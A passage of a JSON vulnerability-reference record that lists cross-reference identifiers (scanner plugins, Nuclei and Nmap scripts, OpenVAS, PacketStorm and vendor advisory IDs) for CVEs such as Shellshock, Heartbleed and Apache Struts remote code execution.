"CENTOS_RHSA-2014-1306.NASL", "CENTOS_RHSA-2017-3080.NASL", "CENTOS_RHSA-2017-3081.NASL", "CHECK_POINT_GAIA_SK102673.NASL", "CISCO-SA-20140926-BASH-NXOS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "CISCO-SA-CSCUR01959-ASA-CX.NASL", "CISCO-SA-CSCUR01959-PRSM.NASL", "CISCO-VCS-CSCUO16472.NASL", "CISCO_CUPS_CSCUR05454.NASL", "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "CISCO_TELEPRESENCE_VCS_CSCUR01461.NASL", "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "DEBIAN_DLA-1325.NASL", "DEBIAN_DLA-63.NASL", "DEBIAN_DSA-1199.NASL", "DEBIAN_DSA-2896.NASL", "DEBIAN_DSA-3032.NASL", "DEBIAN_DSA-3035.NASL", "DEBIAN_DSA-4156.NASL", "DRUPAL_8_5_1.NASL", "DRUPAL_CVE-2018-7600_RCE.NBIN", "EULEROS_SA-2017-1261.NASL", "EULEROS_SA-2017-1262.NASL", "EULEROS_SA-2019-1418.NASL", "F5_BIGIP_SOL15159.NASL", "F5_BIGIP_SOL15629.NASL", "FEDORA_2014-11295.NASL", "FEDORA_2014-11360.NASL", "FEDORA_2014-11503.NASL", "FEDORA_2014-11514.NASL", "FEDORA_2014-11527.NASL", "FEDORA_2014-11718.NASL", "FEDORA_2014-4879.NASL", "FEDORA_2014-4910.NASL", "FEDORA_2014-4982.NASL", "FEDORA_2014-4999.NASL", "FEDORA_2014-5321.NASL", "FEDORA_2014-5337.NASL", "FEDORA_2014-9308.NASL", "FEDORA_2017-EBB76FC3C9.NASL", "FEDORA_2017-EF7C118DBC.NASL", "FEDORA_2017-F499EE7B12.NASL", "FEDORA_2018-906BA26B4D.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FILEZILLA_SERVER_0944.NASL", "FORTINET_FG-IR-14-011.NASL", "FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL", "FREEBSD_PKG_5631AE98BE9E11E3B5E3C80AA9043978.NASL", "FREEBSD_PKG_71AD81DA441411E4A33E3C970E169BC2.NASL", "FREEBSD_PKG_81E2B3084A6C11E4B7116805CA0B3D42.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "FREEBSD_PKG_C0DAE63448204505850DB1C975D0F67D.NASL", "GENTOO_GLSA-200608-11.NASL", "GENTOO_GLSA-201404-07.NASL", "GENTOO_GLSA-201409-09.NASL", "GENTOO_GLSA-201409-10.NASL", "GENTOO_GLSA-201412-11.NASL", "GPON_CVE-2018-10561.NBIN", "GPON_CVE-2019-3919.NBIN", "GPON_CVE-2019-3920.NBIN", "HPSMH_7_3_2.NASL", "HP_INSIGHT_CONTROL_SERVER_MIGRATION_7_3_2.NASL", "HP_LOADRUNNER_12_00_1.NASL", "HP_OFFICEJET_PRO_HEARTBLEED.NASL", "HP_ONBOARD_ADMIN_HEARTBLEED_VERSIONS.NASL", "HP_VCA_SSRT101531-RHEL.NASL", "HP_VCA_SSRT101531-SLES.NASL", "HP_VCA_SSRT101531.NASL", "HP_VCRM_SSRT101531.NASL", "IBM_GPFS_ISG3T1020683.NASL", "IBM_RATIONAL_CLEARQUEST_8_0_1_3_01.NASL", "IBM_STORWIZE_1_5_0_4.NASL", "IIS6_WEBDAV_CVE-2017-7269.NASL", "IIS6_WEBDAV_CVE-2017-7269_DIRECT.NASL", "IPSWITCH_IMAIL_12_4_1_15.NASL", "JUNIPER_JSA10623.NASL", "JUNIPER_SPACE_JSA10648.NASL", "JUNOS_PULSE_JSA10623.NASL", "KASPERSKY_INTERNET_SECURITY_HEARTBLEED.NASL", "KERIO_CONNECT_824.NASL", "LIBREOFFICE_423.NASL", "MACOSX_10_10.NASL", "MACOSX_FUSION_6_0_3.NASL", "MACOSX_LIBREOFFICE_423.NASL", "MACOSX_SECUPD2014-005.NASL", "MACOSX_SHELLSHOCK_UPDATE.NASL", "MANDRAKE_MDKSA-2006-125.NASL", "MANDRIVA_MDVSA-2014-123.NASL", "MANDRIVA_MDVSA-2014-186.NASL", "MANDRIVA_MDVSA-2014-190.NASL", "MANDRIVA_MDVSA-2015-062.NASL", "MANDRIVA_MDVSA-2015-164.NASL", "MCAFEE_EMAIL_GATEWAY_SB10071.NASL", "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "MCAFEE_EPO_SB10071.NASL", "MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL", "MCAFEE_NGFW_SB10071.NASL", "MCAFEE_NGFW_SB10085.NASL", "MCAFEE_VSEL_SB10071.NASL", "MCAFEE_WEB_GATEWAY_SB10071.NASL", "MCAFEE_WEB_GATEWAY_SB10085.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "MYSQL_ENTERPRISE_MONITOR_4_0_2_5168.NASL", "MYSQL_ENTERPRISE_MONITOR_8_0_3.NASL", "NEWSTART_CGSL_NS-SA-2019-0033_OPENSSL.NASL", "NEWSTART_CGSL_NS-SA-2019-0117_TOMCAT6.NASL", "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "OPENSSL_1_0_1G.NASL", "OPENSSL_HEARTBLEED.NASL", "OPENSUSE-2014-277.NASL", "OPENSUSE-2014-318.NASL", "OPENSUSE-2014-398.NASL", "OPENSUSE-2014-559.NASL", "OPENSUSE-2014-563.NASL", "OPENSUSE-2014-564.NASL", "OPENSUSE-2014-567.NASL", "OPENSUSE-2014-594.NASL", "OPENSUSE-2014-595.NASL", "OPENSUSE-2017-1299.NASL", "OPENVPN_2_3_3_0.NASL", "OPENVPN_HEARTBLEED.NASL", "ORACLELINUX_ELSA-2014-0376.NASL", "ORACLELINUX_ELSA-2014-1293.NASL", "ORACLELINUX_ELSA-2014-1294.NASL", "ORACLELINUX_ELSA-2014-1306.NASL", "ORACLELINUX_ELSA-2017-3080.NASL", "ORACLELINUX_ELSA-2017-3081.NASL", "ORACLEVM_OVMSA-2014-0032.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "ORACLE_RDBMS_CPU_JAN_2018.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "OT_500424.NASL", "PALO_ALTO_PAN-SA-2014-0004.NASL", "PROFTPD_BASH_INJECTION.NASL", "REDHAT-RHSA-2014-0376.NASL", "REDHAT-RHSA-2014-0377.NASL", "REDHAT-RHSA-2014-0378.NASL", "REDHAT-RHSA-2014-0396.NASL", "REDHAT-RHSA-2014-0416.NASL", "REDHAT-RHSA-2014-1293.NASL", "REDHAT-RHSA-2014-1294.NASL", "REDHAT-RHSA-2014-1306.NASL", "REDHAT-RHSA-2014-1311.NASL", "REDHAT-RHSA-2014-1354.NASL", "REDHAT-RHSA-2017-3080.NASL", "REDHAT-RHSA-2017-3081.NASL", "REDHAT-RHSA-2017-3113.NASL", "REDHAT-RHSA-2018-0268.NASL", "REDHAT-RHSA-2018-0270.NASL", "REDHAT-RHSA-2018-0275.NASL", "REDHAT-RHSA-2018-0466.NASL", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SHELLSHOCK_MAIL_AGENTS.NASL", "SHELLSHOCK_POSTFIX_FILTERS.NASL", "SHELLSHOCK_QMAIL.NASL", "SHELLSHOCK_SIP_INVITE.NASL", "SLACKWARE_SSA_2014-098-01.NASL", "SLACKWARE_SSA_2014-267-01.NASL", "SL_20140408_OPENSSL_ON_SL6_X.NASL", "SL_20140924_BASH_ON_SL5_X.NASL", "SL_20140926_BASH_ON_SL5_X.NASL", "SL_20171030_TOMCAT6_ON_SL6_X.NASL", "SL_20171030_TOMCAT_ON_SL7_X.NASL", "SMB_KB2962393.NASL", "SMB_NT_MS17_JUNE_XP_2003.NASL", "SOLARIS10_126546-06.NASL", "SOLARIS10_126546.NASL", "SOLARIS10_X86_126547.NASL", "SOLARIS11_BASH_20141031.NASL", "SOLARIS11_BASH_20141031_2.NASL", "SOLARIS11_BASH_2014_10_07.NASL", "SOLARIS11_OPENSSL_20140731.NASL", "SOLARIS9_149079-01.NASL", "SOLARIS9_149079.NASL", "SOLARIS9_X86_149080-01.NASL", "SOLARIS9_X86_149080.NASL", "SPLUNK_603.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_13.NASL", "STRUTS_2_5_13_REST_RCE.NASL", "STRUTS_2_5_17.NASL", "STRUTS_2_5_17_RCE.NASL", "STUNNEL_5_01.NASL", "SUN_JAVA_WEB_SERVER_7_0_27.NASL", "SUSE_11_BASH-140919.NASL", "SUSE_11_BASH-140926.NASL", "SUSE_SU-2021-14705-1.NASL", "SYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL", "TENABLE_OT_SIEMENS_CVE-2014-0160.NASL", "TOMCAT_6_0_24.NASL", "TOMCAT_7_0_81.NASL", "TOMCAT_7_0_82.NASL", "TOMCAT_8_0_47.NASL", "TOMCAT_8_5_23.NASL", "TOMCAT_9_0_1.NASL", "TOMCAT_PUT_JSP.NASL", "UBUNTU_USN-2165-1.NASL", "UBUNTU_USN-2362-1.NASL", "UBUNTU_USN-3665-1.NASL", "UBUNTU_USN-4773-1.NASL", "USERMIN_1220_INFO_DISCLOSURE.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0010.NASL", "VIRTUOZZO_VZLSA-2017-3080.NASL", "VMWARE_ESXI_5_5_BUILD_1746974_REMOTE.NASL", "VMWARE_HORIZON_WORKSPACE_VMSA2014-0004.NASL", "VMWARE_NSX_VMSA_2014_0010.NASL", "VMWARE_PLAYER_LINUX_6_0_2.NASL", "VMWARE_PLAYER_MULTIPLE_VMSA_2014-0004.NASL", "VMWARE_VCENTER_CONVERTER_2014-0010.NASL", "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2014-0010.NASL", "VMWARE_VMSA-2014-0004.NASL", "VMWARE_VMSA-2014-0004_REMOTE.NASL", "VMWARE_VMSA-2014-0010.NASL", "VMWARE_VMSA-2014-0010_REMOTE.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL", "VMWARE_WORKSPACE_PORTAL_VMSA2014-0010.NASL", "VMWARE_WORKSTATION_LINUX_10_0_2.NASL", "VMWARE_WORKSTATION_MULTIPLE_VMSA_2014_0004.NASL", "WD_ARKEIA_10_1_19_VER_CHECK.NASL", "WEBLOGIC_2017_10271.NASL", "WEBMIN_1290.NASL", "WEBSENSE_EMAIL_SECURITY_HEARTBLEED.NASL", "WEBSENSE_WEB_SECURITY_HEARTBLEED.NASL", "WEB_APPLICATION_SCANNING_112310", "WINSCP_5_5_3.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-SHELLSHOCK.NSE", "NMAP:HTTP-VULN-CVE2006-3392.NSE", "NMAP:HTTP-VULN-CVE2017-5638.NSE", "NMAP:SSL-HEARTBLEED.NSE"]}, {"type": "nuclei", "idList": ["NUCLEI:\"CVE-2017-12617\"", "NUCLEI:CVE-2014-6271", "NUCLEI:CVE-2017-10271", "NUCLEI:CVE-2017-12611", "NUCLEI:CVE-2017-5638", "NUCLEI:CVE-2017-7269", "NUCLEI:CVE-2017-9791", "NUCLEI:CVE-2017-9805", "NUCLEI:CVE-2018-11776", "NUCLEI:CVE-2018-7600"]}, {"type": "nvidia", "idList": ["NVIDIA:4386"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2014-0160"]}, {"type": "openvas", "idList": ["OPENVAS:105021", "OPENVAS:105022", "OPENVAS:1361412562310103550", "OPENVAS:1361412562310103936", "OPENVAS:1361412562310105010", "OPENVAS:1361412562310105021", "OPENVAS:1361412562310105022", "OPENVAS:1361412562310105040", "OPENVAS:1361412562310105093", "OPENVAS:1361412562310105094", "OPENVAS:1361412562310105146", "OPENVAS:1361412562310105156", "OPENVAS:1361412562310105684", "OPENVAS:1361412562310105693", "OPENVAS:1361412562310105722", "OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108438", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310108792", "OPENVAS:1361412562310111013", "OPENVAS:1361412562310113170", "OPENVAS:1361412562310120077", "OPENVAS:1361412562310120209", "OPENVAS:1361412562310121175", "OPENVAS:1361412562310121272", "OPENVAS:1361412562310121273", "OPENVAS:1361412562310121297", "OPENVAS:1361412562310123304", "OPENVAS:1361412562310123430", "OPENVAS:1361412562310140041", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140228", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141028", "OPENVAS:1361412562310141029", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310702896", "OPENVAS:1361412562310703032", "OPENVAS:1361412562310703035", "OPENVAS:1361412562310704156", "OPENVAS:1361412562310802082", "OPENVAS:1361412562310802085", "OPENVAS:1361412562310802086", "OPENVAS:1361412562310804489", "OPENVAS:1361412562310804490", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310811206", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811730", "OPENVAS:1361412562310811854", "OPENVAS:1361412562310812057", "OPENVAS:1361412562310812058", "OPENVAS:1361412562310812583", "OPENVAS:1361412562310812584", "OPENVAS:1361412562310813786", "OPENVAS:1361412562310814523", "OPENVAS:1361412562310841774", "OPENVAS:1361412562310841984", "OPENVAS:1361412562310843539", "OPENVAS:1361412562310850582", "OPENVAS:1361412562310850615", "OPENVAS:1361412562310850616", "OPENVAS:1361412562310850618", "OPENVAS:1361412562310850676", "OPENVAS:1361412562310850768", "OPENVAS:1361412562310850778", "OPENVAS:1361412562310850890", "OPENVAS:1361412562310850945", "OPENVAS:1361412562310850988", "OPENVAS:1361412562310851651", "OPENVAS:1361412562310867676", "OPENVAS:1361412562310867679", "OPENVAS:1361412562310867688", "OPENVAS:1361412562310867701", "OPENVAS:1361412562310867767", "OPENVAS:1361412562310867768", "OPENVAS:1361412562310867850", "OPENVAS:1361412562310867851", "OPENVAS:1361412562310868079", "OPENVAS:1361412562310868082", "OPENVAS:1361412562310868208", "OPENVAS:1361412562310868211", "OPENVAS:1361412562310868415", "OPENVAS:1361412562310868417", "OPENVAS:1361412562310868705", "OPENVAS:1361412562310868936", "OPENVAS:1361412562310869125", "OPENVAS:1361412562310871154", "OPENVAS:1361412562310871248", "OPENVAS:1361412562310871250", "OPENVAS:1361412562310873711", "OPENVAS:1361412562310873766", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310876320", "OPENVAS:1361412562310881918", "OPENVAS:1361412562310882027", "OPENVAS:1361412562310882028", "OPENVAS:1361412562310882030", "OPENVAS:1361412562310882031", "OPENVAS:1361412562310882032", "OPENVAS:1361412562310882033", "OPENVAS:1361412562310882795", "OPENVAS:1361412562310882796", "OPENVAS:1361412562310891325", "OPENVAS:1361412562311220171261", "OPENVAS:1361412562311220171262", "OPENVAS:1361412562311220191418", "OPENVAS:57067", "OPENVAS:57540", "OPENVAS:57861", "OPENVAS:702896", "OPENVAS:703032", "OPENVAS:703035", "OPENVAS:841774", "OPENVAS:850582", "OPENVAS:867676", "OPENVAS:867679", "OPENVAS:867688", "OPENVAS:867701", "OPENVAS:867767", "OPENVAS:867768", "OPENVAS:871154", "OPENVAS:881918"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2018", "ORACLE:CPUAPR2019", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2019", "ORACLE:CPUJUL2014-1972956", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2018"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0376", "ELSA-2014-1293", "ELSA-2014-1294", "ELSA-2014-1652", "ELSA-2015-3022", "ELSA-2016-3621", "ELSA-2017-3080", "ELSA-2017-3081", "ELSA-2019-4581", "ELSA-2019-4747", "ELSA-2021-9150"]}, {"type": "osv", "idList": ["OSV:DLA-1325-1", "OSV:DLA-63-1", "OSV:DSA-1199-1", "OSV:DSA-2896-1", "OSV:DSA-3032-1", "OSV:DSA-3035-1", "OSV:GHSA-CR6J-3JP9-RW65", "OSV:GHSA-GG9M-FJ3V-R58C", "OSV:GHSA-J77Q-2QQG-6989", "OSV:GHSA-XJGH-84HX-56C5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125021", "PACKETSTORM:126065", "PACKETSTORM:126069", "PACKETSTORM:126070", "PACKETSTORM:126072", "PACKETSTORM:126101", "PACKETSTORM:126288", "PACKETSTORM:126308", "PACKETSTORM:128394", "PACKETSTORM:128395", "PACKETSTORM:128418", "PACKETSTORM:128425", "PACKETSTORM:128442", "PACKETSTORM:128443", "PACKETSTORM:128444", "PACKETSTORM:128447", "PACKETSTORM:128460", "PACKETSTORM:128481", "PACKETSTORM:128482", "PACKETSTORM:128520", "PACKETSTORM:128522", "PACKETSTORM:128554", "PACKETSTORM:128572", "PACKETSTORM:128573", "PACKETSTORM:128650", "PACKETSTORM:128878", "PACKETSTORM:129260", "PACKETSTORM:131073", "PACKETSTORM:132254", "PACKETSTORM:133070", "PACKETSTORM:134594", "PACKETSTORM:134806", "PACKETSTORM:137376", "PACKETSTORM:139304", "PACKETSTORM:140205", "PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:141997", "PACKETSTORM:142060", "PACKETSTORM:142471", "PACKETSTORM:144034", "PACKETSTORM:144050", "PACKETSTORM:144424", "PACKETSTORM:144557", "PACKETSTORM:144591", "PACKETSTORM:146143", "PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:147482", "PACKETSTORM:149086", "PACKETSTORM:149087", "PACKETSTORM:149277", "PACKETSTORM:149467", "PACKETSTORM:150687", "PACKETSTORM:151177", "PACKETSTORM:86448"]}, {"type": "paloalto", "idList": ["PAN-SA-2014-0004"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7", "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "photon", "idList": ["PHSA-2017-0078"]}, {"type": "prion", "idList": ["PRION:CVE-2009-3843", "PRION:CVE-2009-4189", "PRION:CVE-2014-0160", "PRION:CVE-2014-0346", "PRION:CVE-2014-0964", "PRION:CVE-2014-2601", "PRION:CVE-2014-3671", "PRION:CVE-2014-6271", "PRION:CVE-2014-6277", "PRION:CVE-2014-62771", "PRION:CVE-2014-6278", "PRION:CVE-2014-7169", "PRION:CVE-2014-7227", "PRION:CVE-2015-8249", "PRION:CVE-2017-10271", "PRION:CVE-2017-12617", "PRION:CVE-2017-5638", "PRION:CVE-2017-7269", "PRION:CVE-2017-9805", "PRION:CVE-2018-10561", "PRION:CVE-2018-11776", "PRION:CVE-2018-7600"]}, {"type": "qt", "idList": ["QT:AA25C9F2A179C07C68BE4260EC5E6C9C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:072B2FAC9B9B391A9AAB97CB87BCCB8C", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980", "QUALYSBLOG:E752DE2F12FECA2E217194D510424325"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD", "RAPID7COMMUNITY:2D16953CACCA4F69B642B05183F60758", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:D35B422CE8C15A23745FD83E2205F7C7"]}, {"type": "redhat", "idList": ["RHSA-2014:0376", "RHSA-2014:0377", "RHSA-2014:0378", "RHSA-2014:0396", "RHSA-2014:0416", "RHSA-2014:1293", "RHSA-2014:1294", "RHSA-2014:1295", "RHSA-2014:1306", "RHSA-2014:1311", "RHSA-2014:1312", "RHSA-2014:1354", "RHSA-2014:1865", "RHSA-2017:3080", "RHSA-2017:3081", "RHSA-2017:3113", "RHSA-2017:3114", "RHSA-2018:0268", "RHSA-2018:0269", "RHSA-2018:0270", "RHSA-2018:0271", "RHSA-2018:0275", "RHSA-2018:0465", "RHSA-2018:0466", "RHSA-2018:2939"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-12617", "RH:CVE-2017-5638", "RH:CVE-2017-9805", "RH:CVE-2018-11776"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:115143B4FAD70F6ECA6FF95A951FEA51", "SAINT:17FB524069BA3CD18537B30C76190BF7", "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:2AE124BF9DEB7BF62DF04248DEE949D2", "SAINT:2E3ECAFB8AE7339B98B8B66F6B3CB6B6", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:49062325B1FAB54D731E4C8FBF78D940", "SAINT:49E3C4DD42AD3A5B772ACBDD5C6E1DBD", "SAINT:5B8CEB9A64574FBC9B91366BB8FFC719", "SAINT:5BBB36CD07D0D401F363CA3F726533A5", "SAINT:5C86AB1074A96B306662C51ADE6F4B61", "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "SAINT:7C12BAFAA5D8DBBC0D183D44EB230ABB", "SAINT:7CC6DA9BCE40E1A4453714BA7B40AFF7", "SAINT:88789BF22A82B3B79355F9F1C375C644", "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "SAINT:966010900F7632E797C552D31C2BB53A", "SAINT:9764B1C9A7FFDFC322F184608200C05E", "SAINT:A192C3991EB7069FAA4A6A96BA76C435", "SAINT:B20ACFE275443E794149275B36EB8F99", "SAINT:E218D6FA073276BB012BADF2CCE50F0E", "SAINT:E7D41DAA0FE2CCB57388A4812EEC9C00", "SAINT:EA7480D87E33A13B3179AF9B56E84AFC"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33", "SECURELIST:2F75371B5752C888430A598DF749FD1A", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:5B679E7779B8DC4B28B53545967190C4", "SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D", "SECURELIST:B61F1A3C7FBA17501CE779F4E076EB79", "SECURELIST:C7E3F6A27205B506CE8683317323C0BC", "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22818", "SECURITYVULNS:DOC:22821", "SECURITYVULNS:DOC:30469", "SECURITYVULNS:DOC:30471", "SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:30473", "SECURITYVULNS:DOC:30474", "SECURITYVULNS:DOC:30475", "SECURITYVULNS:DOC:30476", "SECURITYVULNS:DOC:30477", "SECURITYVULNS:DOC:30478", "SECURITYVULNS:DOC:30479", "SECURITYVULNS:DOC:30480", "SECURITYVULNS:DOC:30481", "SECURITYVULNS:DOC:30494", "SECURITYVULNS:DOC:30495", "SECURITYVULNS:DOC:30496", "SECURITYVULNS:DOC:30497", "SECURITYVULNS:DOC:30498", "SECURITYVULNS:DOC:30499", "SECURITYVULNS:DOC:30500", "SECURITYVULNS:DOC:30501", "SECURITYVULNS:DOC:30502", "SECURITYVULNS:DOC:30503", "SECURITYVULNS:DOC:30504", "SECURITYVULNS:DOC:30505", "SECURITYVULNS:DOC:30506", "SECURITYVULNS:DOC:30507", "SECURITYVULNS:DOC:30508", "SECURITYVULNS:DOC:30509", "SECURITYVULNS:DOC:30510", "SECURITYVULNS:DOC:30511", "SECURITYVULNS:DOC:30512", "SECURITYVULNS:DOC:30519", "SECURITYVULNS:DOC:30520", "SECURITYVULNS:DOC:30522", "SECURITYVULNS:DOC:30523", "SECURITYVULNS:DOC:30524", "SECURITYVULNS:DOC:30525", "SECURITYVULNS:DOC:30526", "SECURITYVULNS:DOC:30530", "SECURITYVULNS:DOC:30537", "SECURITYVULNS:DOC:30539", "SECURITYVULNS:DOC:30553", "SECURITYVULNS:DOC:30696", "SECURITYVULNS:DOC:30771", "SECURITYVULNS:DOC:30776", "SECURITYVULNS:DOC:31100", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:31103", "SECURITYVULNS:DOC:31125", "SECURITYVULNS:DOC:31129", "SECURITYVULNS:DOC:31130", "SECURITYVULNS:DOC:31131", "SECURITYVULNS:DOC:31135", "SECURITYVULNS:DOC:31147", "SECURITYVULNS:DOC:31150", "SECURITYVULNS:DOC:31299", "SECURITYVULNS:DOC:32393", "SECURITYVULNS:VULN:10414", "SECURITYVULNS:VULN:13679", "SECURITYVULNS:VULN:13708", "SECURITYVULNS:VULN:13977", "SECURITYVULNS:VULN:14050"]}, {"type": "seebug", "idList": ["SSV:14974", "SSV:62086", "SSV:62180", "SSV:62181", "SSV:62182", "SSV:62185", "SSV:62186", "SSV:62187", "SSV:62188", "SSV:62189", "SSV:62190", "SSV:62192", "SSV:62197", "SSV:62198", "SSV:62199", "SSV:62238", "SSV:62239", "SSV:62240", "SSV:62241", "SSV:62244", "SSV:62245", "SSV:86019", "SSV:86038", "SSV:86061", "SSV:86255", "SSV:87270", "SSV:87294", "SSV:87317", "SSV:87331", "SSV:88877", "SSV:92577", "SSV:92746", "SSV:92804", "SSV:92834", "SSV:95013", "SSV:96420", "SSV:96624", "SSV:97009", "SSV:97207", "SSV:97258"]}, {"type": "slackware", "idList": ["SSA-2014-098-01", "SSA-2014-267-01", "SSA-2014-272-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0492-1", "OPENSUSE-SU-2014:1226-1", "OPENSUSE-SU-2014:1229-1", "OPENSUSE-SU-2014:1238-1", "OPENSUSE-SU-2014:1242-1", "OPENSUSE-SU-2014:1254-1", "OPENSUSE-SU-2017:3069-1", "SUSE-SU-2014:1212-1", "SUSE-SU-2014:1213-1", "SUSE-SU-2014:1214-1", "SUSE-SU-2014:1223-1", "SUSE-SU-2014:1247-1", "SUSE-SU-2014:1247-2", "SUSE-SU-2014:1259-1", "SUSE-SU-2014:1260-1", "SUSE-SU-2014:1287-1", "SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1", "SUSE-SU-2017:3039-1", "SUSE-SU-2017:3059-1", "SUSE-SU-2017:3279-1"]}, {"type": "symantec", "idList": ["SMNTC-101304", "SMNTC-1364", "SMNTC-1419", "SMNTC-70103"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:0F7112302CBABF46D19CACCCFA6103C5", "THN:129FB15A6EC81B3F21210807A7547381", "THN:1859301C4A1DFB7CAC529CC0D8AA84DD", "THN:1B1451C703B36A8CEE5DAEE33ECE8D47", "THN:244769C413FFA5BE647D8F6F93431B74", "THN:2707247140A4F620671B33D68FEB1EA9", "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "THN:3E9A13AAEA7FDC38D7BD8A148F19663D", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:4868B616BCBA555DA2446F6F0EA837B0", "THN:491E94A14CDEFCFFF9753033F61D1E0E", "THN:4DE731C9D113C3993C96A773C079023F", 